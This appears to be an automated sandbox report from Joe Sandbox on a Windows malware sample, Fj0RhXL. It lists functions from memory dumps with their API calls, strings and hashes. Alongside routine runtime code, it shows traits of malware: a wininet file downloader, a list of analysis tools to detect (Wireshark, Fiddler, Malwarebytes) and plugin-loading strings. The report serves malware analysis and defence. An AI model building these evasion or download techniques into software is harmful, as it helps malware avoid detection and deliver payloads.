Part of subcall function 03DA28DB: DeleteCriticalSection.KERNEL32(0000002C,?,?,03D9C6D7,03D9C6BD,03DB7688,00000008,03D9C7A8,?,?,?,03DB76A8,0000000C,03D9C863,?), ref: 03DA8CBA

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 03DA2C26
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 03DA2C33
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 03DA2C40
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 03DA2C4D
TlsAlloc.KERNEL32(?,?,03D9C614,03DB7688,00000008,03D9C7A8,?,?,?,03DB76A8,0000000C,03D9C863,?), ref: 03DA2C9D
TlsSetValue.KERNEL32(00000000,?,?,03D9C614,03DB7688,00000008,03D9C7A8,?,?,?,03DB76A8,0000000C,03D9C863,?), ref: 03DA2CB8
__init_pointers.LIBCMT ref: 03DA2CC2
EncodePointer.KERNEL32(?,?,03D9C614,03DB7688,00000008,03D9C7A8,?,?,?,03DB76A8,0000000C,03D9C863,?), ref: 03DA2CD3
EncodePointer.KERNEL32(?,?,03D9C614,03DB7688,00000008,03D9C7A8,?,?,?,03DB76A8,0000000C,03D9C863,?), ref: 03DA2CE0
EncodePointer.KERNEL32(?,?,03D9C614,03DB7688,00000008,03D9C7A8,?,?,?,03DB76A8,0000000C,03D9C863,?), ref: 03DA2CED
EncodePointer.KERNEL32(?,?,03D9C614,03DB7688,00000008,03D9C7A8,?,?,?,03DB76A8,0000000C,03D9C863,?), ref: 03DA2CFA
DecodePointer.KERNEL32(Function_00022A5F,?,?,03D9C614,03DB7688,00000008,03D9C7A8,?,?,?,03DB76A8,0000000C,03D9C863,?), ref: 03DA2D1B
__calloc_crt.LIBCMT ref: 03DA2D30
DecodePointer.KERNEL32(00000000,?,?,03D9C614,03DB7688,00000008,03D9C7A8,?,?,?,03DB76A8,0000000C,03D9C863,?), ref: 03DA2D4A
GetCurrentThreadId.KERNEL32 ref: 03DA2D5C

Strings

FlsFree, xrefs: 03DA2C42
FlsAlloc, xrefs: 03DA2C20
FlsSetValue, xrefs: 03DA2C35
KERNEL32.DLL, xrefs: 03DA2BFF
FlsGetValue, xrefs: 03DA2C28

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3698121176-3819984048
Opcode ID: 9999e71ea7ab43fa3bf41db8cb04597e692c6f4a30ae2d4e7472f52de182524d
Instruction ID: 341d295c425b8c17d8a077ea5e08466e8e21927a6af01e5c8c8edbacd22f4a5e
Opcode Fuzzy Hash: 9999e71ea7ab43fa3bf41db8cb04597e692c6f4a30ae2d4e7472f52de182524d
Instruction Fuzzy Hash: 3D3173B79B2703DECF11FB7AA90861ABEA4EB447207240E16E410D7359EF758041CF52

Function 02F09B95 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,02F076F2,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F09B9D
__mtterm.LIBCMT ref: 02F09BA9

Part of subcall function 02F09874: DecodePointer.KERNEL32(0000000B,02F077B5,02F0779B,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F09885
Part of subcall function 02F09874: TlsFree.KERNEL32(0000002A,02F077B5,02F0779B,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F0989F
Part of subcall function 02F09874: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,02F077B5,02F0779B,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F0C142
Part of subcall function 02F09874: _free.LIBCMT ref: 02F0C145
Part of subcall function 02F09874: DeleteCriticalSection.KERNEL32(0000002A,?,?,02F077B5,02F0779B,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F0C16C

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02F09BBF
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02F09BCC
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02F09BD9
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02F09BE6
TlsAlloc.KERNEL32(?,?,02F076F2,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F09C36
TlsSetValue.KERNEL32(00000000,?,?,02F076F2,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F09C51
__init_pointers.LIBCMT ref: 02F09C5B
EncodePointer.KERNEL32(?,?,02F076F2,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F09C6C
EncodePointer.KERNEL32(?,?,02F076F2,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F09C79
EncodePointer.KERNEL32(?,?,02F076F2,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F09C86
EncodePointer.KERNEL32(?,?,02F076F2,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F09C93
DecodePointer.KERNEL32(Function_000099F8,?,?,02F076F2,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F09CB4
__calloc_crt.LIBCMT ref: 02F09CC9
DecodePointer.KERNEL32(00000000,?,?,02F076F2,02F17AE0,00000008,02F07886,?,?,?,02F17B00,0000000C,02F07941,?), ref: 02F09CE3
GetCurrentThreadId.KERNEL32 ref: 02F09CF5

Strings

FlsSetValue, xrefs: 02F09BCE
FlsFree, xrefs: 02F09BDB
FlsGetValue, xrefs: 02F09BC1
KERNEL32.DLL, xrefs: 02F09B98
FlsAlloc, xrefs: 02F09BB9

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3698121176-3819984048
Opcode ID: 5e2595a780f2f085c71406e5bc4a37430bfd3e7740a2a2100b79eee1d469aab7
Instruction ID: c7f5d3e1febf6825dc29994ef534de2d70fb2cc770e858ec25edc88bf720599c
Opcode Fuzzy Hash: 5e2595a780f2f085c71406e5bc4a37430bfd3e7740a2a2100b79eee1d469aab7
Instruction Fuzzy Hash: 39318F31DC0308DAE7216F75EC88A06BFA1AB95BE87D60A16E511D2395FBB09460DF50

Function 03D97070 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 170stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 03D97092
_wcsrchr.LIBCMT ref: 03D9709A
_memset.LIBCMT ref: 03D970D1
_wcsrchr.LIBCMT ref: 03D970D9
lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03D970E6
_memset.LIBCMT ref: 03D97154
wsprintfW.USER32 ref: 03D9716C
_memset.LIBCMT ref: 03D97180
_memset.LIBCMT ref: 03D9719B
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,00000002), ref: 03D971D1
lstrcatW.KERNEL32(?,03DB5FCC), ref: 03D97219
lstrcatW.KERNEL32(?,?), ref: 03D97223
_memset.LIBCMT ref: 03D9723A

Strings

WinSta0\Default, xrefs: 03D97252
%s\shell\open\command, xrefs: 03D97166
"%1, xrefs: 03D971DD
D, xrefs: 03D97246

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: _memset$_wcsrchrlstrcat$EnvironmentExpandStringslstrlenwsprintf
String ID: "%1$%s\shell\open\command$D$WinSta0\Default
API String ID: 3970221696-33419044
Opcode ID: 40042f0e2c147baee8bb669554e6276a2f9902aec0ea73ac8eca4ef65bbde579
Instruction ID: 4465d639c5c780f17ff5e90b0407360bd2e737e3bbd43326e07c1f62d1098323
Opcode Fuzzy Hash: 40042f0e2c147baee8bb669554e6276a2f9902aec0ea73ac8eca4ef65bbde579
Instruction Fuzzy Hash: 0051DC76950318ABEF20EB60DD49FEE7378DF55700F404596B609AA180FA70D798CB71

Function 03D9F4E5 Relevance: 34.8, APIs: 23, Instructions: 290COMMON

Download Yara Rule

APIs

__malloc_crt.LIBCMT ref: 03D9F546
__calloc_crt.LIBCMT ref: 03D9F556
__calloc_crt.LIBCMT ref: 03D9F561
__calloc_crt.LIBCMT ref: 03D9F56C
__calloc_crt.LIBCMT ref: 03D9F57B
GetCPInfo.KERNEL32(?,?), ref: 03D9F5CE
___crtGetStringTypeA.LIBCMT ref: 03D9F63C
___crtLCMapStringA.LIBCMT ref: 03D9F66F
___crtLCMapStringA.LIBCMT ref: 03D9F69C

Part of subcall function 03D9FAE5: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 03D9FAF3
Part of subcall function 03D9FAE5: __crtLCMapStringA_stat.LIBCMT ref: 03D9FB14

_memmove.LIBCMT ref: 03D9F747
_memmove.LIBCMT ref: 03D9F756
_memmove.LIBCMT ref: 03D9F768
InterlockedDecrement.KERNEL32(?), ref: 03D9F77B
_free.LIBCMT ref: 03D9F791
_free.LIBCMT ref: 03D9F7A4
_free.LIBCMT ref: 03D9F7B2
_free.LIBCMT ref: 03D9F7BD
_free.LIBCMT ref: 03D9F804
_free.LIBCMT ref: 03D9F811
_free.LIBCMT ref: 03D9F819
_free.LIBCMT ref: 03D9F821
_free.LIBCMT ref: 03D9F829
InterlockedDecrement.KERNEL32(?), ref: 03D9F841

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: _free$String__calloc_crt$___crt_memmove$DecrementInterlockedLocale$A_statInfoTypeUpdateUpdate::___crt__malloc_crt
String ID:
API String ID: 2476947982-0
Opcode ID: d386fe8ada329bcd54f4fcb46aec4c6d309f332c4f109b7ed81c17e0db4e07f4
Instruction ID: d02738ab6685d923c2c6275c6c0a2aaa5700e9c0725a17835d0ee0a5f16cf6f9
Opcode Fuzzy Hash: d386fe8ada329bcd54f4fcb46aec4c6d309f332c4f109b7ed81c17e0db4e07f4
Instruction Fuzzy Hash: 37B14BB5D00349AFEF21DFA4C880BEEBBB9FF08705F18446AE455EB250D675A845CB20

Function 03D89180 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 141libraryloaderfileCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wininet.dll), ref: 03D891C3
GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 03D891D7
FreeLibrary.KERNEL32(00000000), ref: 03D891F7
GetProcAddress.KERNEL32(00000000,InternetOpenUrlW), ref: 03D89216
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 03D89253
_memset.LIBCMT ref: 03D8927E
GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 03D8928C
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 03D892DB
CloseHandle.KERNEL32(?), ref: 03D892F9
Sleep.KERNEL32(00000001), ref: 03D89301
GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 03D8930D
FreeLibrary.KERNEL32(00000000), ref: 03D89328

Strings

InternetReadFile, xrefs: 03D89286
MSIE 6.0, xrefs: 03D891E1
InternetOpenUrlW, xrefs: 03D89210
InternetCloseHandle, xrefs: 03D89307
wininet.dll, xrefs: 03D891A6
InternetOpenW, xrefs: 03D891D1

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FileFree$CloseCreateHandleLoadSleepWrite_memset
String ID: InternetCloseHandle$InternetOpenUrlW$InternetOpenW$InternetReadFile$MSIE 6.0$wininet.dll
API String ID: 1463273941-1099148085
Opcode ID: 61365048590b62e2a9a5c9a47625887a8f76b4854eb9cd26213fb6ef28e41247
Instruction ID: 02afe1ce970f6cbed82ad663bc5030e83aa448bc514523ee65869382bf42129d
Opcode Fuzzy Hash: 61365048590b62e2a9a5c9a47625887a8f76b4854eb9cd26213fb6ef28e41247
Instruction Fuzzy Hash: D1415872A4021CEADB60EB649C45FEEB7F8FF44700F14C595E589A6280DF70AA458FE4

Function 6C366E7C Relevance: 30.2, APIs: 2, Strings: 15, Instructions: 451COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6C366FF7
__floor_pentium4.LIBCMT ref: 6C367303

Strings

Z, xrefs: 6C367224
H?Gl, xrefs: 6C366FCF
`+Gl, xrefs: 6C367439
H?Gl, xrefs: 6C36743E
(NGl, xrefs: 6C366FCA
H?Gl, xrefs: 6C366EEF
H?Gl, xrefs: 6C367013
H?Gl, xrefs: 6C36706C
`zGl, xrefs: 6C367095
`+Gl, xrefs: 6C366F1C
`+Gl, xrefs: 6C366EEA
P@Gl, xrefs: 6C3672C4
H?Gl, xrefs: 6C3670BA
(NGl, xrefs: 6C36701C
H?Gl, xrefs: 6C366F17

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: __floor_pentium4_memmove
String ID: (NGl$(NGl$H?Gl$H?Gl$H?Gl$H?Gl$H?Gl$H?Gl$H?Gl$P@Gl$Z$`+Gl$`+Gl$`+Gl$`zGl
API String ID: 1533020526-2972744755
Opcode ID: d6d694e1455fdd849eceaef0802432527be6fc933ff03ca4709a5623d4e16d12
Instruction ID: e00d1ae208fbf9ba6255bc8227e85140fb23fbbb01e7f31e727b08a048c92366
Opcode Fuzzy Hash: d6d694e1455fdd849eceaef0802432527be6fc933ff03ca4709a5623d4e16d12
Instruction Fuzzy Hash: D3F13672E08909D7CB20FF67D844AA97774F746B60F360A88D8C557AD8DF3208A4CB95

Function 03D9F491 Relevance: 27.3, APIs: 18, Instructions: 303COMMON

Download Yara Rule

APIs

__malloc_crt.LIBCMT ref: 03D9F546
__calloc_crt.LIBCMT ref: 03D9F556
__calloc_crt.LIBCMT ref: 03D9F561
__calloc_crt.LIBCMT ref: 03D9F56C
__calloc_crt.LIBCMT ref: 03D9F57B
GetCPInfo.KERNEL32(?,?), ref: 03D9F5CE
___crtGetStringTypeA.LIBCMT ref: 03D9F63C
___crtLCMapStringA.LIBCMT ref: 03D9F66F
_free.LIBCMT ref: 03D9F804
_free.LIBCMT ref: 03D9F811
_free.LIBCMT ref: 03D9F819
_free.LIBCMT ref: 03D9F821
_free.LIBCMT ref: 03D9F829
InterlockedDecrement.KERNEL32(?), ref: 03D9F841

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$String___crt$DecrementInfoInterlockedType__malloc_crt
String ID:
API String ID: 3200333012-0
Opcode ID: b225f8bf6d0a25cc9a4b87f29f96f38cd6fe10dcc0aac8b93f5af57f33443591
Instruction ID: c91e2c9767b6579cd48149c7267dd4c4fd601d5a70eae13d43f0c5ee83b4c7bf
Opcode Fuzzy Hash: b225f8bf6d0a25cc9a4b87f29f96f38cd6fe10dcc0aac8b93f5af57f33443591
Instruction Fuzzy Hash: 01B16EB5D00219AFEF21DFA4C884BEEBBB9FF09701F18406AE585EB250D7759945CB20

Function 02F04520 Relevance: 27.2, APIs: 18, Instructions: 247threadnetworksleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 02F0454A
timeGetTime.WINMM ref: 02F0456B
GetCurrentThreadId.KERNEL32 ref: 02F0458B
InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02F045AD
SwitchToThread.KERNEL32 ref: 02F045C7
SetEvent.KERNEL32(?), ref: 02F04610
CloseHandle.KERNEL32(?), ref: 02F04634
send.WS2_32(?,02F17420,00000010,00000000), ref: 02F04658
SetEvent.KERNEL32(?), ref: 02F04676
InterlockedExchange.KERNEL32(?,00000000), ref: 02F04681
WSACloseEvent.WS2_32(?), ref: 02F0468F
shutdown.WS2_32(?,00000001), ref: 02F046A3
closesocket.WS2_32(?), ref: 02F046AD
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 02F046E6
SetLastError.KERNEL32(000005B4), ref: 02F046FA
GetCurrentThreadId.KERNEL32 ref: 02F0471B
InterlockedExchange.KERNEL32(?,00000001), ref: 02F04733

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: EventExchangeInterlockedThread$CloseCurrentErrorLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
String ID:
API String ID: 1692523546-0
Opcode ID: 134150a6819c53b0c00e7de53809fc163e3ceb1d9d8a3d024ee142ac1ca555c8
Instruction ID: 2f5b8f1e4972cb3958b714fb2c26ed135e5571299438f871071fee0642033120
Opcode Fuzzy Hash: 134150a6819c53b0c00e7de53809fc163e3ceb1d9d8a3d024ee142ac1ca555c8
Instruction Fuzzy Hash: 32919B71A00616ABC724DFA4D8C8B6AF7A5FF44785F508519E70A8B680D770F8A1DFD0

Function 6C371CB7 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 113COMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 6C371CF1
_sprintf.LIBCMT ref: 6C371D35
__floor_pentium4.LIBCMT ref: 6C371D52
__floor_pentium4.LIBCMT ref: 6C371D69
__floor_pentium4.LIBCMT ref: 6C371DA1
_sprintf.LIBCMT ref: 6C371DD3
__floor_pentium4.LIBCMT ref: 6C371DF2
_sprintf.LIBCMT ref: 6C371E10

Strings

,%02ds, xrefs: 6C371D7D
%7.3f, xrefs: 6C371CDD, 6C371CEA
%2d%.3s%02d, xrefs: 6C371DC8
0Ari00, xrefs: 6C371CEB, 6C371CF0, 6C371D2A, 6C371D34, 6C371DCD, 6C371DD2
%11.7f, xrefs: 6C371CD6
'%02d", xrefs: 6C371E06
%2dh,%02dm, xrefs: 6C371D2F

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: __floor_pentium4_sprintf
String ID: 0Ari00$%11.7f$%2d%.3s%02d$%2dh,%02dm$%7.3f$'%02d"$,%02ds
API String ID: 4172657630-3850279763
Opcode ID: 91069a3700af225f6093d19824ce25bf537f4c569492772bd4a0244761c6f80e
Instruction ID: 5074a5cc96e6900a84cb5a7ee1e669c05f7bc071df4cd37f4f2f203307b07cde
Opcode Fuzzy Hash: 91069a3700af225f6093d19824ce25bf537f4c569492772bd4a0244761c6f80e
Instruction Fuzzy Hash: BC31E7B3901908F7DF10AB66DC05EEDBF7CEB45318F130599F484A6910CB758968CBA6

Function 6C354F2D Relevance: 24.8, APIs: 6, Strings: 8, Instructions: 338COMMON

Download Yara Rule

APIs

Part of subcall function 6C37294E: _free.LIBCMT ref: 6C372954

Part of subcall function 6C370A72: _memset.LIBCMT ref: 6C370A83

_memset.LIBCMT ref: 6C354FB6
_fgets.LIBCMT ref: 6C354FEA
_fgets.LIBCMT ref: 6C3550A6
_sprintf.LIBCMT ref: 6C3552FF
_sprintf.LIBCMT ref: 6C355332
_sprintf.LIBCMT ref: 6C35535A

Strings

Zone change error: Unknown rule in entry %d of zone %d: '%s', xrefs: 6C35534E
Zone change error: Bad month in entry %d of zone %d: '%s', xrefs: 6C355371
Zone change error: The %d zones have %d entries, which differs from total entry limit of %d, xrefs: 6C3552E4
Zone change error: Rule %d (%s) is never used by any zone change entry., xrefs: 6C355385
Zone change error: Zone %d unknown: '%s', xrefs: 6C3552F3
Zone change error: Zone %d (%s) has %d entries, which exceed total entry limit of %d, xrefs: 6C35532C
timezone changes, xrefs: 6C354F84
, xrefs: 6C3550AE

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _sprintf$_fgets_memset$_free
String ID: $Zone change error: Bad month in entry %d of zone %d: '%s'$Zone change error: Rule %d (%s) is never used by any zone change entry.$Zone change error: The %d zones have %d entries, which differs from total entry limit of %d$Zone change error: Unknown rule in entry %d of zone %d: '%s'$Zone change error: Zone %d (%s) has %d entries, which exceed total entry limit of %d$Zone change error: Zone %d unknown: '%s'$timezone changes
API String ID: 1495787504-2309610737
Opcode ID: eb1836fe1f64d1beec9bfb0d558df94152587ed5d85b091c44779ae2b1c7508a
Instruction ID: fdb2b91d70604499ce17a6959d7c68df8be39aaada047fb62b6870ad10b7df72
Opcode Fuzzy Hash: eb1836fe1f64d1beec9bfb0d558df94152587ed5d85b091c44779ae2b1c7508a
Instruction Fuzzy Hash: 25D11771A092599EEF21CF18C840FD9BBF4BF06308FA44199C4C593A41D772A9E6CFA1

Function 03D953B0 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 254COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 03D95408
_memset.LIBCMT ref: 03D95448
_memset.LIBCMT ref: 03D954CE
swprintf.LIBCMT ref: 03D954ED

Part of subcall function 03D9ABD2: _malloc.LIBCMT ref: 03D9ABEC

_memset.LIBCMT ref: 03D955C5
swprintf.LIBCMT ref: 03D955E4
_memset.LIBCMT ref: 03D95646
swprintf.LIBCMT ref: 03D95665

Strings

plugmark, xrefs: 03D9541B
onlyloadinmyself, xrefs: 03D953DC
%s %s, xrefs: 03D954DC, 03D95550, 03D955D3, 03D95654

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: _memset$swprintf$_malloc
String ID: %s %s$onlyloadinmyself$plugmark
API String ID: 1873853019-591889663
Opcode ID: f9794c229a0a789150de3c1e5fe198805e878a8e54279e7380c462d3200e0179
Instruction ID: c392e6fe79b295312112727af49d1345e9897ee815071c0cbfafd4854a831c1c
Opcode Fuzzy Hash: f9794c229a0a789150de3c1e5fe198805e878a8e54279e7380c462d3200e0179
Instruction Fuzzy Hash: 0081D1B6A40300ABFB10EF24EC86F6B77A5DF46714F084165ED195F383E671E91486B2

Function 03D864F0 Relevance: 24.7, APIs: 2, Strings: 12, Instructions: 164windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 03D86503

Strings

Sniff, xrefs: 03D86679
Fiddler, xrefs: 03D8663F
TCPEye, xrefs: 03D86579
Capsa, xrefs: 03D86667, 03D8668B
TaskExplorer, xrefs: 03D8658F
Wireshark, xrefs: 03D865E7
Port, xrefs: 03D865BB
ApateDNS, xrefs: 03D8654D
Metascan, xrefs: 03D865D1
CurrPorts, xrefs: 03D865A5
Process, xrefs: 03D8669D
Malwarebytes, xrefs: 03D86563

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

